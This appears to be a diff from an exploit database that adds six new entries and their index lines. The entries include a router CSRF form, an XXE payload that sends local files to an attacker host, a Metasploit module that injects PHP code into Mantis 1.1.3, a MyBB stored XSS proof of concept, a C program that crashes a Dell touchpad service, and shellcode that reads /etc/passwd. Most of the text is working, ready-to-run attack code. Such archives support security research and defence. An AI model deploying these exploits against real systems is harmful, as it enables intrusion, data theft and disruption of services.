DB: 2018-05-11

7 changes to exploits/shellcodes

Dell Touchpad - 'ApMsgFwd.exe' Denial of Service

Mantis 1.1.3 - manage_proj_page PHP Code Execution (Metasploit)
Fastweb FASTGate 0.00.47 - Cross-site Request Forgery
ModbusPal 1.6b - XML External Entity Injection
MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting

Linux/x86 - Read /etc/passwd Shellcode (62 bytes)

exploits/hardware/webapps/44606.html

@@ -0,0 +1,42 @@
+# Exploit Title: Fastweb FASTgate 0.00.47 CSRF
+# Date: 09-05-2018
+# Exploit Authors: Raffaele Sabato
+# Contact: https://twitter.com/syrion89
+# Vendor: Fastweb
+# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/
+# Version: 0.00.47
+# CVE: CVE-2018-6023
+
+I DESCRIPTION
+========================================================================
+
+An issue was discovered in Fastweb FASTgate 0.00.47 device. A Cross-site request forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that modify the configuration. This vulnerability may lead to Gues Wi-Fi activating, Wi-Fi password changing, etc.
+The vulnerability was disclosed to Fastweb on 19 January 2018.
+Fastweb independently patched customer devices with non-vulneable version .67 from December 2017 thru March 2018.
+
+II PROOF OF CONCEPT
+========================================================================
+
+## Activate Gues Wi-Fi:
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://192.168.1.254/status.cgi">
+      <input type="hidden" name="&#95;" value="1516312144136" />
+      <input type="hidden" name="act" value="nvset" />
+      <input type="hidden" name="hotspot&#95;broadcast&#95;ssid" value="1" />
+      <input type="hidden" name="hotspot&#95;enable" value="1" />
+      <input type="hidden" name="hotspot&#95;filtering" value="all" />
+      <input type="hidden" name="hotspot&#95;security" value="WPA2PSK" />
+      <input type="hidden" name="hotspot&#95;ssid" value="GUEST&#45;Test" />
+      <input type="hidden" name="hotspot&#95;timeout" value="&#45;1" />
+      <input type="hidden" name="service" value="wl&#95;guestaccess" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+III REFERENCES
+========================================================================
+http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/

exploits/java/webapps/44607.txt

@@ -0,0 +1,53 @@
+[+] Exploit Title: ModbusPal XXE Injection
+[+] Date: 05-08-2018
+[+] Exploit Author: Trent Gordon
+[+] Vendor Homepage: http://modbuspal.sourceforge.net/
+[+] Software Link: https://sourceforge.net/projects/modbuspal/files/latest/download?source=files
+[+] Version: 1.6b
+[+] Tested on: Ubuntu 16.04 with Java 1.8.0_151
+[+] CVE: CVE-2018-10832
+
+1. Vulnerability Description
+
+ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack.  Projects are saved as .xmpp files and automations can be exported as .xmpa files, both XML-based and vulnerable to XXE injection.  Sending a crafted .xmpp or .xmpa file to a user, when opened/imported in ModbusPal 1.6b, will return the contents of any local files to a remote attacker.
+
+2. Proof of Concept
+
+a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting evil.xml)
+
+b.) Contents of hosted "evil.xml"
+
+<!ENTITY % data SYSTEM "file:///etc/issue">
+<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://ATTACKERS-IP:9999/?%data;'>">
+
+c.) Example Exploited "xxe.xmpa"
+
+<?xml version="1.0" ?>
+
+<!DOCTYPE r [
+
+<!ELEMENT r ANY >
+
+<!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/evil.xml">
+
+%sp;
+
+%param1;
+
+]>
+
+<r>&exfil;</r>
+
+<!DOCTYPE modbuspal_automation SYSTEM "modbuspal.dtd">
+
+<modbuspal_automation>
+
+<automation name="temp" step="1.0" loop="true" init="0.0">
+
+</automation>
+
+</modbuspal_automation>
+
+3. Additional Details
+
+Java 1.7 contains certain defenses against XXE, including throwing a java.net.MalformedURLException when certain characters (such as '/n') are included in a URL.  This means that the file exfiltrated in the above attack is limited to single line files that dont contain any restricted characters.  The above POC uses /etc/issue, which is one of the few common linux files that meets this criteria.  Exploitation of this vulnerability on later versions of Java requires a more creative approach than described above, such as using FTP instead of URL to exfiltrate /etc/passwd.

exploits/php/remote/44611.rb

@@ -0,0 +1,124 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Mantis manage_proj_page PHP Code Execution',
+      'Description'    => %q{
+        Mantis v1.1.3 and earlier are vulnerable to a post-authentication Remote
+        Code Execution vulnerability in the sort parameter of the
+        manage_proj_page.php page.
+      },
+      'Author'         => [
+        'EgiX',           # Exploit-DB Entry Author
+        'Lars Sorenson'   # MSF module author
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['EDB', '6768'],
+          ['CVE', '2008-4687'],
+        ],
+       'Privileged' => false,
+       'Platform'   => ['php'],
+       'Arch'       => ARCH_PHP,
+       'Targets' =>
+          [
+            [ 'Mantis <= 1.1.3', { } ],
+          ],
+      'DisclosureDate' => 'Oct 16, 2008',
+      'DefaultTarget' => 0))
+     register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path to the Mantis installation', '/mantisbt/']),
+        OptString.new('USERNAME', [true, 'The username to log in as', 'administrator']),
+        OptString.new('PASSWORD', [true, 'The password to log in with', 'root']),
+      ])
+  end
+
+  def check
+    vprint_status('Checking Mantis version ...')
+    res = send_request_cgi({
+      'uri'    => normalize_uri(target_uri.path, 'login_page.php'),
+      'method' => 'GET'
+    })
+
+    unless res
+      vprint_error('Connection to host failed!')
+      return CheckCode::Unknown
+    end
+
+    unless res.body =~ /Mantis ([0-9]+\.[0-9]+\.[0-9]+)/
+      vprint_error('Cannot determine Mantis version!')
+      return CheckCode::Unknown
+    end
+
+    version = Gem::Version.new(Regexp.last_match[1])
+
+    vprint_status("Mantis version #{version} detected")
+
+    if res.code == 200 && version <= Gem::Version.new('1.1.3')
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
+  end
+
+  def login
+    vprint_status("Logging in as #{datastore['username']}:#{datastore['password']} ... ")
+    res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(target_uri.path, 'login_page.php'),
+    })
+    unless res
+      fail_with(Failure::Unreachable, 'Cannot access host to log in!')
+    end
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path, 'login.php'),
+      'method'    => 'POST',
+      'vars_post' => {
+        'username': datastore['username'],
+        'password': datastore['password'],
+      },
+      'cookie'=> "PHPSESSID=#{res.get_cookies}"
+    })
+    unless res
+      fail_with(Failure::Unknown, 'Cannot access host to log in!')
+    end
+
+    fail_with(Failure::Unreachable, 'Login failed!') unless res.code == 302
+    fail_with(Failure::NoAccess, 'Wrong credentials!') if res.redirection.to_s.include?('login_page.php')
+
+    store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+    res.get_cookies
+  end
+
+  def exploit
+    fail_with(Failure::NotVulnerable, 'Target is not vulnerable!') unless check == CheckCode::Appears
+
+    cookie = login
+    vprint_status('Sending payload ...')
+    payload_b64 = Rex::Text.encode_base64(payload.encoded)
+    data = {
+      'sort' => "']);}error_reporting(0);print(_code_);eval(base64_decode($_SERVER[HTTP_CMD]));die();#",
+    }
+    send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path, 'manage_proj_page.php'),
+      'method'    => 'POST',
+      'vars_post' => data,
+      'headers' => {
+        'Connection': 'close',
+        'Cookie': cookie.to_s,
+        'Cmd': payload_b64
+      }
+    })
+  end
+end

exploits/php/webapps/44608.txt

@@ -0,0 +1,28 @@
+# Exploit Title: MyBB Latest Posts on Profile Plugin v1.1 - Cross-Site Scripting
+# Date: 4/20/2018
+# Author: 0xB9
+# Contact: luxorforums.com/User-0xB9 or 0xB9[at]pm.me
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=914
+# Version: 1.1
+# Tested on: Ubuntu 17.10
+# CVE: CVE-2018-10580
+
+
+1. Description:
+Adds a new section to user profiles that will display their last posts.
+ 
+
+2. Proof of Concept:
+
+Persistent XSS
+- Create a thread with the following subject <script>alert('XSS')</script>
+- Now visit your profile to see the alert.
+
+
+3. Solution:
+I reported the plugin twice over the past 3 weeks and recieved no response.
+
+
+The following should be added in line 236 to properly sanitize thread subjects.
+
+$d['tsubject'] = htmlspecialchars_uni($d['tsubject']);

exploits/windows/dos/44610.c

@@ -0,0 +1,112 @@
+/*
+Title: Dell Touchpad - ApMsgFwd.exe Denial Of Service
+Author: Souhail Hammou
+Vendor Homepage: https://www.alps.com/
+Tested on : Alps Pointing-device Driver 10.1.101.207
+CVE: CVE-2018-10828
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <windows.h>
+
+/*
+Details:
+==========
+ApMsgFwd.exe belonging to Dell Touchpad, ALPS Touchpad driver, ALPS pointing-device for VAIO, Thinkpad Ultranav Driver ..etc 
+allows the current user to map and write to the "ApMsgFwd File Mapping Object" section. 
+ApMsgFwd.exe uses the data written to the section as arguments to functions. 
+This causes a denial of service condition when invalid pointers are written to the mapped section. 
+
+The crash :
+===========
+(b88.aa0): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+KERNELBASE!MultiByteToWideChar+0x3d8:
+00007ffc`06422e08 443830          cmp     byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??
+0:004> r
+rax=d05d05d05d05d05d rbx=00000000000004e4 rcx=000000007fffffff
+rdx=0000000000000000 rsi=00000000ffffffff rdi=d05d05d05d05d05d
+rip=00007ffc06422e08 rsp=000000000272fae0 rbp=000000000272fb59
+ r8=0000000000000000  r9=00000000ffffffff r10=0000000000000000
+r11=000000000272fbc0 r12=00000000000001f4 r13=0000000000000000
+r14=0000000000000000 r15=0000000000563e40
+iopl=0         nv up ei pl zr na po nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+KERNELBASE!MultiByteToWideChar+0x3d8:
+00007ffc`06422e08 443830          cmp     byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??
+
+
+0:001> lm v m ApMsgFwd
+Browse full module list
+start             end                 module name
+00000000`00400000 00000000`00415000   ApMsgFwd   (no symbols)
+    Loaded symbol image file: C:\Program Files\DellTPad\ApMsgFwd.exe
+    Image path: C:\Program Files\DellTPad\ApMsgFwd.exe
+    Image name: ApMsgFwd.exe
+    Browse all global symbols  functions  data
+    Timestamp:        Tue Jul  1 09:03:05 2014 (53B27949)
+    CheckSum:         00020F5D
+    ImageSize:        00015000
+    File version:     8.1.0.44
+    Product version:  8.1.0.44
+    File flags:       0 (Mask 3F)
+    File OS:          40004 NT Win32
+    File type:        1.0 App
+    File date:        00000000.00000000
+    Translations:     0411.04b0
+    CompanyName:      Alps Electric Co., Ltd.
+    ProductName:      ApMsgFwd
+    InternalName:     ApMsgFwd
+    OriginalFilename: ApMsgFwd.exe
+    ProductVersion:   8, 1, 0, 44
+    FileVersion:      8, 1, 0, 44
+    PrivateBuild:     8, 1, 0, 44
+    SpecialBuild:     8, 1, 0, 44
+    FileDescription:  ApMsgFwd
+    LegalCopyright:   Copyright (C) 2006-2014 Alps Electric Co., Ltd.
+    LegalTrademarks:  Copyright (C) 2006-2014 Alps Electric Co., Ltd.
+    Comments:         Copyright (C) 2006-2014 Alps Electric Co., Ltd.
+*/
+int main(int argc, char** argv)
+{
+    HANDLE ApMpHnd,StartEvtHnd,KeyHnd;
+    PBYTE MappedBuf;
+
+    if ( ! (ApMpHnd = OpenFileMappingA(FILE_MAP_WRITE,FALSE,"ApMsgFwd File Mapping Object") ) )
+    {
+        printf("OpenFileMapping Failed !\n");
+        goto ret;
+    }
+
+    if ( ! ( MappedBuf = MapViewOfFile(ApMpHnd,FILE_MAP_WRITE,0,0,0x1A0) ) )
+    {
+        printf("MapViewOfFile Failed !\n");
+        goto cleanup_0;
+    }
+
+    StartEvtHnd = OpenEventA(EVENT_MODIFY_STATE,FALSE,"ApMsgFwd Event Start");
+
+    if ( ! StartEvtHnd )
+    {
+        printf("OpenEvent Failed !\n");
+        goto cleanup_1;
+    }
+
+    ZeroMemory(MappedBuf,0x1A0);
+    *MappedBuf = 9; //switch case 9
+    *(DWORD*)(MappedBuf + 0x60) = 0x5D05D05D;
+    *(DWORD*)(MappedBuf + 0x64) = 0xD05D05D0;
+
+    /*Wake up the waiting thread*/
+    SetEvent(StartEvtHnd);
+    
+    CloseHandle(StartEvtHnd);
+cleanup_1:
+    UnmapViewOfFile(MappedBuf);
+cleanup_0:
+    CloseHandle(ApMpHnd);
+ret:
+    return 0;
+}

exploits/windows/webapps/44497.txt

@@ -3,6 +3,8 @@
 # Software Vendor: NComputing
 # Software Link: 
 # Author: Javier Bernardo
+# Contact: javier@kwell.net
+# Website: http://www.kwell.net
 # CVE: CVE-2018-10201
 # Category: Webapps
 

files_exploits.csv

@@ -5968,6 +5968,7 @@ id,file,description,date,author,type,platform,port
 44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows,
 44600,exploits/windows_x86/dos/44600.c,"2345 Security Guard 3.7 - Denial of Service",2018-05-08,anhkgg,dos,windows_x86,
 44605,exploits/windows/dos/44605.py,"Allok Video Splitter 3.1.12.17 - Denial of Service",2018-05-09,Achilles,dos,windows,
+44610,exploits/windows/dos/44610.c,"Dell Touchpad - 'ApMsgFwd.exe' Denial of Service",2018-05-10,"Souhail Hammou",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16480,6 +16481,7 @@ id,file,description,date,author,type,platform,port
 44597,exploits/unix/remote/44597.rb,"Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)",2018-05-08,Metasploit,remote,unix,443
 44598,exploits/php/remote/44598.rb,"PlaySMS - 'import.php' Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
 44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
+44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - manage_proj_page PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39292,3 +39294,6 @@ id,file,description,date,author,type,platform,port
 44587,exploits/php/webapps/44587.txt,"IceWarp Mail Server < 11.1.1 - Directory Traversal",2018-05-04,"Trustwave's SpiderLabs",webapps,php,
 44589,exploits/linux/webapps/44589.txt,"CSP MySQL User Manager 2.3.1 - Authentication Bypass",2018-05-06,"Youssef Mami",webapps,linux,
 44595,exploits/php/webapps/44595.rb,"WordPress Plugin User Role Editor < 4.25 - Privilege Escalation",2018-05-06,"Tomislav Paskalev",webapps,php,
+44606,exploits/hardware/webapps/44606.html,"Fastweb FASTGate 0.00.47 - Cross-site Request Forgery",2018-05-10,"Raffaele Sabato",webapps,hardware,
+44607,exploits/java/webapps/44607.txt,"ModbusPal 1.6b - XML External Entity Injection",2018-05-10,"Trent Gordon",webapps,java,
+44608,exploits/php/webapps/44608.txt,"MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting",2018-05-10,0xB9,webapps,php,

files_shellcodes.csv

@@ -882,3 +882,4 @@ id,file,description,date,author,type,platform
 44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
 44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86
 44602,shellcodes/linux_x86/44602.c,"Linux/x86 - Bind TCP (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)",2018-05-09,"Amine Kanane",shellcode,linux_x86
+44609,shellcodes/linux_x86/44609.c,"Linux/x86 - Read /etc/passwd Shellcode (62 bytes)",2018-05-10,"Nuno Freitas",shellcode,linux_x86

shellcodes/linux_x86/44609.c

@@ -0,0 +1,66 @@
+/*
+; Title     : Linux/x86 - Read /etc/passwd Shellcode (62 bytes)
+; Date      : May, 2018
+; Author    : Nuno Freitas
+; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-polymorphing-shellcodes/
+; Twitter   : @nunof11
+; SLAE ID   : SLAE-1112
+; Size      : 62 bytes
+; Tested on : i686 GNU/Linux
+
+section .text
+
+global _start
+
+_start:
+	xor eax, eax
+	jmp two
+
+one:
+	pop ebx
+	mov al, 0x5
+	int 0x80
+	mov esi, eax
+	jmp read
+
+exit:
+	mov al, 0x1
+	xor ebx, ebx
+	int 0x80
+
+read:
+	mov ebx, esi
+	mov al, 0x3
+	mov ecx, esp
+	mov dl, 0x01
+	int 0x80
+
+	xor ebx, ebx
+	cmp eax, ebx
+	je exit
+
+	mov al, 0x4
+	mov bl, 0x1
+	int 0x80
+
+	inc esp
+	jmp read
+
+two:
+	call one
+	string: db "/etc/passwd"
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[] = \
+"\x31\xc9\xf7\xe1\xeb\x28\x5b\xb0\x05\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x89\xe1\xb2\x01\xcd\x80\x31\xdb\x39\xd8\x74\xea\xb0\x04\xb3\x01\xcd\x80\x44\xeb\xe7\xe8\xd3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
+
+void main()
+{
+	printf("Shellcode Length:  %d\n", strlen(shellcode));
+
+	int (*ret)() = (int(*)())shellcode;
+	ret();
+}